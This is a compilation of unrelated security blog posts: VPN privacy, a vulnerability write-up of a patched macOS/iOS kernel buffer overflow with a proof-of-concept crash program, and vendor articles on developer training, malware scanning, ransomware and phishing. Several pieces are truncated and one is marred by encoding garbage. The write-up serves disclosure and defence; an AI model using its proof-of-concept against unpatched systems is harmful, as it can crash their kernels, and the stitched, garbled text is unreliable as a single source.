As soon as we hit the DNS box, privacy starts to go down the toilet as your browser (or other internet connected client) makes a plain text, unencrypted query to a DNS server which is usually your ISP's. Because it's a plain text query, the site your client it querying is immediately observable by anyone sitting on the connection. So what about DNS over HTTPS, or DoH? It solves the interception problem but of course the query still needs to be sent to a DNS server somewhere and at that point, the name being queried and the origin of the query (your IP address) is still visible. From a privacy perspective, this isn't necessarily doing a lot for you.

Side note: we saw a great illustration of how much value ISPs put in being able to intercept DNS queries after the industry body for ISPs in the UK named Mozilla an "Internet Villain" for their push towards DoH. In classic anti-encryption style, the moral neutrality of crypto has led to complaints about increased privacy being used to, well, do things more privately whether they be good things or bad things.

With the DNS dance done, what's the impact on privacy then? Well, per the earlier ANZ example the initial request from the browser is still almost always sent insecurely over HTTP so everyone along the way not only sees where the traffic is going, but can also read and modify the contents of it so again, from a privacy perspective, not good. Per Scott's earlier tweet, only 2.3% of the top million websites in the world are resilient to this courtesy of preloading HSTS. But let's imagine the client has already begun communicating over HTTPS before someone starts poking around in their traffic, what then? That brings us to the next problem:

SNI is Server Name Indication and it was born of a need to host multiple sites and certificates on a single IP address. It means that whilst the contents of your traffic is encrypted, the destination it's being sent to, is not:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

As Cloudflare's CEO wrote in the link above: "SNI leaks every site you go to online to your ISP and anyone else listening on the line". Which led him to talk about ESNI or "Encrypted" SNI. Which is great except... It's only supported in Firefox (Chrome support is going nowhere in a hurry). And it's not on by default. And it requires TLS 1.3. And secure DNS. If you want to check whether it works in your own browser, try Cloudflare's ESNI checker (hint: it almost certainly doesn't work). In time, we may see ESNI get traction, but that time is going to be measured in years, not months, at least for it to gain enough market share for you to genuinely browse the internet in private. Except even then, there's a problem:

Encrypted connections are great, but whilst you're connecting to services from your own IP address, can we really call the connection "private"? If it's my IP address, what can the site I'm visiting determine about me? Here's what NordVPN's "What is my IP address" service told me, right down to my suburb:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

Not only may I not want to share this information with the site I visit, I might not want them knowing I'm the same person coming back on subsequent visits (and no, browsers' incognito and private modes don't fix this). I may also not want them joining the dots on who I am by matching my IP address to other public records; HIBP presently indexes 215 data breaches that exposed IP addresses alongside an extensive array of other personal information. Now, maybe your IP address is dynamic, maybe you browsed a service from 4G and it was your wired connection you used last time, maybe it wasn't the same on multiple different exposures. Maybe...

And now, just to make it even worse, consider all the other locations content gets pulled in from just to load your average web page. Take cnn.com as an example:

Padlocks, Phishing and Privacy; The Value Proposition of a VPN

There are 354 requests required to load the page including requests directly to CNN and their various subdomains, to Adnxs (a tracker), DoubleClick (a tracker) and if you scroll further down the report I've linked to above, amazon-adsystem.com (the hint is in the URL), outbrain.com (guess what - a tracker!) and by then I kinda figured I'd made my point and stopped scrolling. The privacy implications don't stop with the site you're visiting, they cascade all the way down the stack of requests that follow that initial one.

As the old saying goes, privacy isn't necessarily about having something to hide, it's also about not having something you want to share; if you're depressed and going to beyondblue.org.au then you may not wish to share that with other people. If you're having trouble with alcohol and visit aa.org.au then you may not want to share that either. If you're pregnant and hopping over to pregnancybirthbaby.org.au then, again, you may expect to keep that information private (let us not forget the story of how Target managed to "data-mine its way into [a teenage girl's] womb"). Just looking up those URLs I was imagining what sort of conclusions would be drawn about me if someone had access to my connection! (No, I'm not a depressed alcoholic teenager who's expecting...)

But privacy goes well beyond just the obvious issues too, for example folks in the US dealing with the death of net neutrality. When your ISP can see your traffic, they can shape your traffic and remember, HTTPS doesn't fix that problem, at least not today. It extends to censorship too and we start to get into a more contentious area here as that spans everything from the local cafe wifi using deny-lists to government-mandated blocks on content (the latter being particularly contentious regarding certain types of content in certain parts of the world). The point is that the privacy rights assured by a VPN are about a lot more than just protecting your source IP from being exposed to the website you're visiting; it goes well beyond that.

Summary

To be clear, using a VPN doesn't magically solve all these issues, it mitigates them. For example, if a site lacks sufficient HTTPS then there's still the network segment between the VPN exit node and the site in question to contend with. It's arguably the least risky segment of the network, but it's still there. The effectiveness of black-holing DNS queries to known bad domains depends on the domain first being known to be bad. CyberSec is still going to do a much better job of that than your ISP, but it won't be perfect. And privacy wise, a VPN doesn't remove DNS or the ability to inspect SNI traffic, it simply removes that ability from your ISP and grants it to NordVPN instead. But then again, I've always said I'd much rather trust a reputable VPN to keep my traffic secure, private and not logged, especially one that's been independently audited to that effect.

The point of all this is that when we look at the value proposition of a VPN, it's about much more than just protecting a segment of the network that may already have HTTPS anyway. We rarely see TLS implemented to its full potential, phishing remains a massive problem and we have far too little privacy when browsing the web.

From a comment to a CVE: Content filter strikes again!

From a comment to a CVE: Content filter strikes again!

0x0- Opening

In the past few years XNU had few vulns in a newly added/changed code areas (extra_recipe, kq double release) and in the content filter area (bug collision uaf, silent patched uaf) so it is no surprise that the combination of the newly added code and complex areas (content-filter) alongside with a funny comment caught our attention.

0x1- Discovery story

Upon a closer look at the newly added xnu source of Darwin 19 you might notice a strange comment in content_filter.c:

/*
 *	TO DO LIST
 *
 *	SOONER:
 *
 *	Deal with OOB
 *
 *	LATER:
 *
 *	If support datagram, enqueue control and address mbufs as well
 */

Is this comment referring to OOB read/write issues? Probably not but it won’t hurt to run a quick search for those so we will use the magic tool CMD +f to search for memcpy calls and in less than two minutes you will find the following 

0x2- The bug.

The newly updated cfil_sock_attach function which is easily reached from tcp_usr_connect and tcp_usr_connectx with controlled variables:

errno_t
cfil_sock_attach(struct socket *so, struct sockaddr *local, struct sockaddr *remote, int dir) // (Part A)
{
	errno_t error = 0;
	uint32_t filter_control_unit;

	socket_lock_assert_owned(so);

	/* Limit ourselves to TCP that are not MPTCP subflows */
	if ((so->so_proto->pr_domain->dom_family != PF_INET &&
	    so->so_proto->pr_domain->dom_family != PF_INET6) ||
	    so->so_proto->pr_type != SOCK_STREAM ||
	    so->so_proto->pr_protocol != IPPROTO_TCP ||
	    (so->so_flags & SOF_MP_SUBFLOW) != 0 ||
	    (so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
		goto done;
	}

	filter_control_unit = necp_socket_get_content_filter_control_unit(so);
	if (filter_control_unit == 0) {
		goto done;
	}

	if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
		goto done;
	}
	if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
		goto done;
	}
	if (cfil_active_count == 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
		goto done;
	}
	if (so->so_cfil != NULL) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
		CFIL_LOG(LOG_ERR, "already attached");
	} else {
		cfil_info_alloc(so, NULL);
		if (so->so_cfil == NULL) {
			error = ENOMEM;
			OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
			goto done;
		}
		so->so_cfil->cfi_dir = dir;
	}
	if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
		CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
		    filter_control_unit);
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
		goto done;
	}
	CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
	    (uint64_t)VM_KERNEL_ADDRPERM(so),
	    filter_control_unit, so->so_cfil->cfi_sock_id);

	so->so_flags |= SOF_CONTENT_FILTER;
	OSIncrementAtomic(&cfil_stats.cfs_sock_attached);

	/* Hold a reference on the socket */
	so->so_usecount++;

	/*
	 * Save passed addresses for attach event msg (in case resend
	 * is needed.
	 */
	if (remote != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
	}
	if (local != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
	}

	error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
	/* We can recover from flow control or out of memory errors */
	if (error == ENOBUFS || error == ENOMEM) {
		error = 0;
	} else if (error != 0) {
		goto done;
	}

	CFIL_INFO_VERIFY(so->so_cfil);
done:
	return error;
}

We can see that in (Part A) the function receives two sockaddrs parameters (local and remote) which are user controlled and then using their sa_len struct member (remote in (Part B) and local in (Part C)) in order to copy data to cfi_so_attach_laddr and cfi_so_attach_faddr. Parts (A) (B) and (C) were all result of a new changes in XNU.

So what’s the problem? The problem is there is lack of check of sa_len which can be set up to 255 and then will be used in a memcpy to copy data into a union sockaddr_in_4_6 which is a 28 bytes struct – resulting in a buffer overflow.

The PoC below which is almost identical to Ian Beer’s mptcp with two changes. This POC requires a pre-requisite to reach the vulnerable area. In order to trigger the vulnerability we need to use an MDM enrolled device with NECP policy, or attach the socket to a valid filter_control_unit. One way to do it is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.

After running the POC, it will crash the kernel:

#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, const char * argv[ ]) {

	int sock = socket(AF_INET, SOCK_STRAEM, IPPROTO,TCP);
	If (sock < 0) {
		printf(“socket failed\n”);
		return -1;
	}
	printf(“got socket: %d\n”, sock);
	struct sockaddr* sockaddr_dst = malloc(256);
	memset(sockaddr_dst, ‘A’, 256);
	sockaddr_dst->sa_len = 255;
	sockaddr_dst->sa_faimly =AF_INET;
	sa_endpoint_t eps = {0};
	eps.sae_srcif = 0;
	eps.sae_srcaddr = NULL;
	eps.sae_srcaddrlen = 0;
eps.sae_dstaddr = sockaddr_dst;
eps.sae_dstaddrlen = 255;
int err = connectx(sock,&eps,SAE_ASSOCID_ANY,0,NULL,0,NULL,NULL);
  printf(“err: %d\n”,err);
close(sock);
return 0;

0x3- Patch

The patch of the issue is interesting too because while the source code (iOS 13.6 / MacOS 10.15.6) provide this patch:

if (remote != NULL && (remote->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
	}
	if (local != NULL && (local->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len);
	}

The disassembly shows something else…

Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):

Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):

The panic call with the mecmpy_chk is gone alongside the patch!

Did the original developer knew this function was vulnerable and placed it there as a placeholder until a proper patch? Your guess is good as ours.

Also note that the call to memcpy_chk before the real_mode_bootstarp_end (which is a wraparound of memcpy) is what kept this issue from being exploitable.

0x4- What can we take from this?

  1. Read comments they might give us valuable information
  2. Newly added code is oftentimes buggy
  3. Content filter code is complex and tricky 
  4. Now with Pangu’s recent blog post and Ian Beer mptcp bug we can learn that sockaddr->sa_len already caused multiple issues and should be audited a bit more carefully.

0x5- Attacks in the wild?

This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threats intelligence database, and saw no active attacks associated with this issue. We still advise to update to the latest version to receive all other updates.

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

16% of Orgs Require Developers to Self-Educate on Security

Theoretical physicist Stephen Hawking was spot on when he said, ???Whether you want to uncover the secrets of the universe, or you just want to pursue a career in the 21st century, basic computer programming is an essential skill to learn.??? It???s no secret that programming is a thriving career path ??? especially with the speed of software development picking up, not slowing down.

But one critical element of modern programming is missing from Hawking???s quote: security. Developers simply aren???t taught secure coding practices in school and so often graduate without the foundational security knowledge required to find and fix flaws before they???re a problem. And at the same time, now more than ever, you???re expected to code with security at top of mind and produce more secure applications without continuous training opportunities at your fingertips.

Secure coding conundrum: Spotty developer training

Recently, we sponsored Enterprise Strategy Group???s (ESG) survey of 378 North American developers and security professionals to gain more insight into the trends in modern application security (AppSec). The results? Developer training is spotty, and it???s often unclear who holds the responsibility of seeing it through.

???While most [organizations] provide developers with some level of security training, more than 50 percent only do so annually or less often.??? The report continues, ???While development managers are often responsible for this training, in many organizations, application security analysts carry the burden of performing remedial training for development teams or individual developers who have a track record of introducing too many security issues.???

Developers participating in formal security training???

There???s a clear disconnect between frequency and educational requirements when it comes to developer training, which leaves most programmers lacking opportunities to learn and grow. Breaking the data down, we see that a mere 15 percent of organizations have the majority of their developers participate in consistent, formal security training.

Security training requirements???

Even more telling about the state of developer education were the numbers that highlighted security training requirements for programmers. For example, 16 percent of organizations say developers are expected to self-educate, while 20 percent only provide training to new developers who join their teams.

If organizations aren???t putting in the effort to expand security know-how, you might (rightfully) see it as a fruitless exercise. Luckily, changing that narrative is often as simple as integrating developer training tools that are clear, engaging, and provide value.

Education that resonates: the right content in the right format

ESG lists the ten elements of the most effective application security programs and it???s no surprise that number five is all about developer participation in security training. While the need is obvious, it???s clear that many organizations still struggle with how to implement developer education ??? and which exercises will even resonate.

As detailed by ESG, security vendors can provide guidance through just-in-time training offerings or remediation advice, but the responsibility still falls on the plate of the developer at the end of the day. Without the right kind of content offered in the right format, it???s more difficult to retain the information you need to code more securely. ???Issue mitigation is often tied to better understanding how and why certain code introduces issues, so developer security training should gradually address this issue,??? ESG states.ツ?

If you want to produce more secure code and reduce risk, it???s no longer enough to simply sit down in front of a tutorial or a multiple-choice quiz and check boxes. The solution? Hands-on secure coding education that takes learning to another level. Real-world training solutions like Veracode Security Labs operate using actual examples you???ll encounter will coding, and that means the lessons are more likely to stick with you from project to project. Veracode Security Labs is different than other training tools, bringing benefits like:

  • Quick and relevant remediation guidance in the popular programming languages
  • Real-world vulnerabilities that you???ll encounter in day-to-day development tasks
  • Enhanced security knowledge to meet compliance needs and build confidence

And while we offer an Enterprise Edition for organizations, we also recently launched Veracode Security Labs Community Edition for developers who are itching to explore the ins and outs of real code on your own time - for free - so that you can start learning secure coding practices and become an active contributor to your organization???s AppSec.

Want more info about shifting your security knowledge left so you can keep cranking out great code? Read the full ESG report here.

Improved malware protection for users in the Advanced Protection Program

Google’s Advanced Protection Program helps secure people at higher risk of targeted online attacks, like journalists, political organizations, and activists, with a set of constantly evolving safeguards that reflect today’s threat landscape. Chrome is always exploring new options to help all of our users better protect themselves against common online threats like malware. As a first step, today Chrome is expanding its download scanning options for users of Advanced Protection.

Advanced Protection users are already well-protected from phishing. As a result, we’ve seen that attackers target these users through other means, such as leading them to download malware. In August 2019, Chrome began warning Advanced Protection users when a downloaded file may be malicious.

Now, in addition to this warning, Chrome is giving Advanced Protection users the ability to send risky files to be scanned by Google Safe Browsing’s full suite of malware detection technology before opening the file. We expect these cloud-hosted scans to significantly improve our ability to detect when these files are malicious.

When a user downloads a file, Safe Browsing will perform a quick check using metadata, such as hashes of the file, to evaluate whether it appears potentially suspicious. For any downloads that Safe Browsing deems risky, but not clearly unsafe, the user will be presented with a warning and the ability to send the file to be scanned. If the user chooses to send the file, Chrome will upload it to Google Safe Browsing, which will scan it using its static and dynamic analysis techniques in real time. After a short wait, if Safe Browsing determines the file is unsafe, Chrome will warn the user. As always, users can bypass the warning and open the file without scanning, if they are confident the file is safe. Safe Browsing deletes uploaded files a short time after scanning.

unknown.exe may be dangerous. Send to Google Advanced Protection for scanning?
Online threats are constantly changing, and it's important that users’ security protections automatically evolve as well. With the US election fast approaching, for example, Advanced Protection could be useful to members of political campaigns whose accounts are now more likely to be targeted. If you’re a user at high-risk of attack, visit g.co/advancedprotection to enroll in the Advanced Protection Program.

Profile of a Security Non-Profit

By 2021 an estimated 3.5 million cybersecurity jobs will be unfilled. This is a statistic familiar to anyone involved in the security field, particularly those responsible for finding the rare talent needed to fill those jobs. More importantly, a deeper dive into those numbers reveals data that is both disappointing and promising.

Ransom from Home – How to close the cyber front door to remote working ransomware attacks

Coronavirus has caused a major shift to our working patterns. In many cases these will long outlast the pandemic. But working from home has its own risks. One is that you may invite ransomware attacks from a new breed of cyber-criminal who has previously confined his efforts to directly targeting the corporate network. Why? Because as a remote worker, you’re increasingly viewed as a soft target—the open doorway to extorting money from your employer.

So how does ransomware land up on your front doorstep? And what can a home worker do to shut that door?

The new ransomware trends

Last year, Trend Micro detected over 61 million ransomware-related threats, a 10% increase from 2018 figures. But things have only gotten worse from there. There has been a 20% spike in ransomware detections globally in the first half of 2020, rising to 109% in the US. And why is that?

At a basic level, ransomware searches for and encrypts most of the files on a targeted computer, so as to make them unusable. Victims are then asked to pay a ransom within a set time frame in order to receive the decryption key they need to unlock their data. If they don’t, and they haven’t backed-up this data, it could be lost forever.

The trend of late, however, has been to focus on public and private sector organizations whose staff are working from home (WFH). The rationale is that remote workers are less likely to be able to defend themselves from ransomware attacks, while they also provide a useful stepping-stone into high-value corporate networks. Moreover, cybercriminals are increasingly looking to steal sensitive data before they encrypt it, even as they’re more likely to fetch a higher ransom for their efforts than they do from a typical consumer, especially if the remote employee’s data is covered by cyber-insurance.

Home workers are also being more targeted for a number of reasons:

  • They may be more distracted than those in the office.
  • Home network and endpoint security may not be up to company levels.
  • Home systems (routers, smart home devices, PCs, etc.,) may not be up-to-date and therefore are more easily exposed to exploits.
  • Remote workers are more likely to visit insecure sites, download risky apps, or share machines/networks with those who do.
  • Corporate IT security teams may be overwhelmed with other tasks and unable to provide prompt support to a remote worker.
  • Security awareness programs may have been lacking in the past, perpetuating bad practice for workers at home.

What’s the attack profile of the remote working threat?

In short, the bad guys are now looking to gain entry to the corporate network you may be accessing from home via a VPN, or to the cloud-hosted systems you use for work or sharing files, in order to first steal and then encrypt company data with ransomware as far and wide as possible into your organization. But the methods are familiar. They’ll

  • Try to trick you into dangerous behavior through email phishing—the usual strategy of getting you to click links that redirect you to bad websites that house malware, or getting you to download a bad file, to start the infection process.
  • Steal or guess your log-ins to work email accounts, remote desktop tools (i.e., Microsoft Remote Desktop or RDP), and cloud-based storage/networks, etc., before they deliver the full ransomware payload. This may happen via a phishing email spoofed to appear as if sent from a legitimate source, or they may scan for your use of specific tools and then try to guess the password (known as brute forcing). One new Mac ransomware, called EvilQuest, has a keylogger built into it, which could capture your company passwords as you type them in. It’s a one-two punch: steal the data first, then encrypt it.
  • Target malware at your VPN or remote desktop software, if it’s vulnerable. Phishing is again a popular way to do this, or they may hide it in software on torrent sites or in app stores. This gives them a foothold into your employer’s systems and network.
  • Target smart home devices/routers via vulnerabilities or their easy-to-guess/crack passwords, in order to use home networks as a stepping-stone into your corporate network.

How can I prevent ransomware when working from home?

The good news is that you, the remote worker, can take some relatively straightforward steps up front to help mitigate the cascading risks to your company posed by the new ransomware. Try the following:

  • Be cautious of phishing emails. Take advantage of company training and awareness courses if offered.
  • Keep your home router firmware, PCs, Macs, mobile devices, software, browsers and operating systems up to date on the latest versions – including remote access tools and VPNs (your IT department may do some of this remotely).
  • Ensure your home network, PCs, and mobile devices are protected with up-to-date with network and endpoint AV from a reputable vendor. (The solutions should include anti-intrusion, anti-web threat, anti-spam, anti-phishing, and of course, anti-ransomware features.)
  • Ensure remote access tools and user accounts are protected with multi-factor authentication (MFA) if used and disable remote access to your home router.
  • Disable Microsoft macros where possible. They’re a typical attack vector.
  • Back-up important files regularly, according to 3-2-1 rule.

How Trend Micro can help

In short, to close the cyber front door to ransomware, you need to protect your home network and all your endpoints (laptops, PCs, mobile devices) to be safe. Trend Micro can help via

  • The Home Network: Home Network Security (HNS) connects to your router to protect any devices connected to the home network — including IoT gadgets, smartphones and laptops — from ransomware and other threats.
  • Desktop endpoints: Trend Micro Security (TMS) offers advanced protection from ransomware-related threats. It includes Folder Shield to safeguard valuable files from ransomware encryption, which may be stored locally or synched to cloud services like Dropbox®, Google Drive® and Microsoft® OneDrive/OneDrive for Business.
  • Mobile endpoints: Trend Micro Mobile Security (also included in TMS) protects Android and iOS devices from ransomware.
  • Secure passwords: Trend Micro Password Manager enables users to securely store and recall strong, unique passwords for all their apps, websites and online accounts, across multiple devices.
  • VPN Protection at home and on-the-go: Trend Micro’s VPN Proxy One (Mac | iOS) solution will help ensure your data privacy on Apple devices when working from home, while its cross-platform WiFi Protection solution will do the same across PCs, Macs, Android and iOS devices when working from home or when connecting to public/unsecured WiFi hotspots, as you venture out and about as the coronavirus lockdown eases in your area.

With these tools, you, the remote worker, can help shut the front door to ransomware, protecting your work, devices, and company from data theft and encryption for ransom.

The post Ransom from Home – How to close the cyber front door to remote working ransomware attacks appeared first on .

Quantum Economic Development Consortium Confirms Steering Committee

GAITHERSBURG, Md. — The Quantum Economic Development Consortium (QED-C) has formally established its steering committee with the signing of participation agreements by Boeing, ColdQuanta, Google, IBM, QC Ware and Zapata Computing. The U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) and the Department of Energy are also members of the steering committee, which will set direction for the consortium as it lays the groundwork for a new commercial industry based on quantum information science and technologies, as well as the supply chain to support it. The

NIST and the Internet Keep Safe Coalition Join Forces on K12 Cybersecurity Education

The U.S. Commerce Department’s National Institute of Standards and Technology (NIST) have announced a new cooperative agreement with the Internet Keep Safe Coalition (iKeepSafe) to assist the National Initiative for Cybersecurity Education (NICE) in its outreach efforts to build a K12 community that inspires cybersecurity career awareness with students in elementary school, stimulates cybersecurity career exploration in middle school, and enables cybersecurity career preparedness in high school. Through a competitive process announced in April, iKeepSafe has been awarded $150,000 per year for

The Biggest Cyberattacks of 2020…so far

It’s been a crazy 2020 so far. The COVID-19 pandemic has ravaged the entire world, changing the nature of how human beings live and interact with each other. There have been other natural disasters that have caused tremendous loss of life and devastation. But that didn’t mean cybercriminals remained quiet….

Evolving Security Products for the new Realities of Living Life From Home

Security for all devices

Announcing McAfee’s Enhanced Consumer Security for New Consumer Realities

With millions of people continuing to work and study remotely, scammers have followed them home—generating an average of 375 new threats per minute so far this year. In response, our enhanced consumer portfolio directly addresses the new needs and new threats people face.

McAfee Labs found that these new threats via malicious apps, phishing campaigns malware, and more, according to its McAfee COVID-19 Threat Report: July 2020, which amounted to an estimated $130 million in total losses in the U.S. alone.

To help people stay safer and combat these threats, today we announced our latest consumer security portfolio. Our enriched products come with better user experiences such as a native Virtual Private Network (VPN), along with new features, including integrated Social Media and Tech Scam Protection—all of which are pressing security essentials today.

Specifically, our product lineup has been updated to include:

Boosts to security and privacy

Scams involving tech support and product activation have continued to sneak into people’s inboxes and search results, which require a critical eye to spot. Here are some tips on how to identify these scams. We’re making it easier for people to stay safer with new features such as:

  • Tech Scam Protection: McAfee® WebAdvisor now provides a warning when visiting websites that can be used by cybercriminals to gain remote access to your PC, helping combat the  $55 million total fraud loss in the U.S. due to tech scams.
  • Advanced Malware Detection: McAfee enhanced its machine learning capabilities to improve overall time to detect emerging threats across devices as well as added protection against file-less threats.

Improvements make it easier for you to stay safer

With jobs and things that simply need to get done “right now,” security can be an afterthought. Sometimes that desire for convenience has consequences, leading to situations where people’s devices, data, and personal information get compromised. In response, we’re doing our part to make security more intuitive so that people can get things done quickly and safely:

  • A Better User Experience: An improved PC and app experience with easier navigation and readable alerts, and clear calls to action for faster understanding of potential issues.
  • Native VPN: Easier access to VPN and anti-malware device protection via one central place and log-in.
  • Updated Password Protection: Access iOS applications even faster with automatically filled in user account information and passwords in both apps and browsers on iOS devices.

Further security enhancements for today’s needs and tomorrow’s threats

With people’s newfound reliance on the internet, we’ve made new advances that help them live their increasingly connected lives—looking after security and privacy even more comprehensively than before on security and the apps they use:

  • Optimized Product Alerts: Redesigned product alerts, so consumers are better informed about possible security risks, with a single-click call to action for immediate protection.
  • Social Media Protection: To help prevent users from accidentally visiting malicious websites, McAfee now annotates social media feeds across six major platforms – Facebook, Twitter, YouTube, Instagram, Reddit, and LinkedIn.
  • Enhanced App Privacy Check: Consumers can now easily see when mobile apps request personal information, with app privacy now integrated into the main scan of Android devices.

McAfee is on a journey to ensure security allows users to be as carefree as possible online, now that more time is spent on devices as consumers navigate a new normal of life from home. For more information on our consumer product lineup, visit https://www.mcafee.com/en-us/antivirus/mcafee-total-protection.html

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Evolving Security Products for the new Realities of Living Life From Home appeared first on McAfee Blogs.

PCI SSC to Host its 2020 Community Meetings Online as Virtual Events

 

In an unprecedented year, PCI Security Standards Council (PCI SSC) will host its 2020 Community Meetings online, as virtual events, for the first time in the Council’s history. The annual North America, Europe and Asia-Pacific Community Meetings offer an opportunity to bring the PCI SSC community together to network with colleagues, share regional insights, and hear important Council updates.

Phishing Email Examples: How to Recognize a Phishing Email

email phishing scams

Phishing Email Examples: How to Recognize a Phishing Email

Keeping your identity safe on the internet can be challenging. Phishing is a scam that tricks you into voluntarily providing important personal information. Protect yourself from phishing by reviewing some examples of phishing emails and learning more about this common online scam.

What is phishing?

Phishing is a type of cybercrime that steals your sensitive information. To trick you into willingly providing information like your website logins and credit card numbers, phishing scammers disguise themselves as major corporations or other trustworthy entities. Phishing scammers will usually contact you via text or email.

What is a phishing email?

A phishing email is a fraudulent email message that is made to look like it was sent by a legitimate company. These emails contain messages that ask you to provide sensitive personal information in various ways. If you don’t look carefully at the emails you receive, you might not be able to tell the difference between a normal email and a phishing email. Scammers work hard to make phishing emails resemble emails sent by trusted companies as closely as possible, which is why you need to be cautious when you open emails and click the links they contain.

How do you spot a phishing email?

Phishing scammers often undo their own plans by making simple mistakes that are easy to spot once you know how to recognize them. Check for the following signs of phishing every time you open an email:

It’s poorly written

Phishing emails often contain grammatical errors, spelling mistakes, and other telltale signs that they weren’t written by marketing departments at major corporations. Even the biggest companies sometimes make small errors in their emails, but if you see multiple, glaring grammatical errors in an email that asks for your personal information, you might have become the target of a phishing scammer.

The logo doesn’t look right

To enhance the credibility of their emails, phishing scammers often steal the logos of prominent corporations or websites. In many cases, however, they don’t steal corporate logos correctly. The logo in a phishing email might have the wrong aspect ratio, or it might be low-resolution. If you have to squint to make out the logo in an email message, chances are that it’s a phishing email.

The URL doesn’t match

Phishing emails always center around links that you’re supposed to click. There are a few ways to check whether a link you’ve been emailed is legitimate. With some email clients, just hovering over the link will be enough to display its URL. Alternatively, you can right-click the link, copy it, and paste the URL into a word processor. On mobile devices, you can check the URL of a link by pressing and holding it with your finger. If the URL you discover doesn’t match up with the entity that supposedly sent you the email, you might have received a phishing email.

Types of phishing emails

Phishing emails come in all shapes and sizes, but there are a few types of phishing emails that are more common than others. Let’s review some examples of the most frequently sent phishing emails:

Account suspended scam

Some phishing emails appear to notify you that your bank account has been temporarily suspended due to unusual activity. If you receive an account suspension email from a bank that you haven’t opened an account with, delete it immediately, and don’t look back. Suspended account phishing emails from banks you do business with, however, are harder to spot. Use the methods we listed above to check the veracity of the email, and if all else fails, contact your bank directly instead of opening any links within the email you received.

Two-factor authentication scam

Two-factor authentication (2FA) has become common, so you’re probably used to receiving emails that ask you to confirm your login information with six-digit numerical codes. Phishing scammers also know how common 2FA has become, and this service that’s supposed to protect your identity might be used for nefarious purposes. If you receive an email asking you to log into an account to confirm your identity, use the criteria we listed above to verify the authenticity of the message. Be especially wary if you’re asked to provide 2FA for an account you haven’t accessed for a while.

Tax refund scam

Everyone likes getting money from the government. That’s what phishing scammers are counting on when they send you phony IRS refund emails. You should always be careful when an email informs you that you’ve received a windfall of cash, and be especially dubious of emails that were supposedly sent by the IRS since this government agency only contacts taxpayers via snail mail. Tax refund phishing scams can do serious harm since they usually ask for your social security number as well as your bank account information.

Phishing at work

You need to be wary of phishing when you’re using your work email as well. One popular phishing scam involves emails that are designed to look like they were sent by someone in the C-suite of your company. They ask workers to wire funds to supposed clients, but this cash actually goes to scammers. Use the tips we listed above to spot these phony emails.

What happens if you click a link in a phishing email?

Never click links in suspicious emails. If you do click a link in an email you suspect was sent by a phishing scammer, however, you will be taken to a web page with a form where you can enter sensitive data such as your social security number, credit card information, or login credentials. Do not enter any data on this page.

What do you do if you suspect you’ve been phished?

If you accidentally enter data in a webpage linked to a suspicious email, disconnect your device from the internet. Next, perform a full malware scan on your device. Once the scan is complete, backup all of your files, and change your passwords. Even if you only provided a phishing scammer with the data from one account, you may have also opened the door to other personal data, so it’s important to change all the passwords you use online in the wake of a suspected phishing attack.

How to recognize a phishing email: simple tips

Let’s wrap things up with some summarized tips on how to avoid phishing emails:

  • When in doubt, directly contact the organization that supposedly emailed you instead of opening links included in suspicious emails.
  • Examine suspicious emails carefully to check for telltale signs of phishing such as poor grammar, grainy logos, or bogus links.
  • If you accidentally click a phishing link, don’t enter any data, and close the page.
  • If you think you’ve been phished, run a virus scan, backup your files, and change all your passwords.

Stay protected

Phishing emails only work on the unwary. Now that you know how to spot phishing emails and what to do if you suspect you’ve been phished, you won’t fall for this type of scam. Just remember to always be careful with your personal information when you use the internet, and err on the side of caution whenever anybody asks you to divulge sensitive details about your identity, your finances, or your login information.

The post Phishing Email Examples: How to Recognize a Phishing Email appeared first on McAfee Blogs.

Write Code That Protects Sensitive User Data

Sensitive data exposure is currently at number 3 in the??ッOWASP Top 10??ッlist of the most critical application security risks.

In this blog post, we will describe common scenarios of incorrect sensitive data handling and suggest ways to protect sensitive data. We will illustrate our suggestions with code samples in C# that can be used in ASP.NET Core applications.

What is sensitive data?

OWASP lists passwords, credit card numbers, health records, personal information and business secrets as sensitive data.

Social security numbers, passwords, biometric data, trade memberships and criminal records can also be thought of at sensitive data.

What exactly sensitive data means for you will depend on:

  • Laws and industry regulations such as EU's General Data Protection Regulation (GDPR) or the UK's Data Protection Act (DPA) that govern the use of "personal data".
  • Business requirements. The law may not enforce strict measures around sensitive data that your application creates or stores for its users, but breaching that data would still hurt your users and, by extension, your business.

In software applications, we can think of sensitive data as:

  1. Most user data (for example, names listed in public user profiles may not be sensitive).
  1. Application data (such as session IDs and encryption keys) that helps protect user data from being exposed.

Various sources and authorities may have different definitions of sensitive data. However, if you're a business that develops an application that works with user data, it's in your best interest to use a broad interpretation of "sensitive data" and do your best to protect it.

What vulnerabilities can lead to sensitive data exposure?

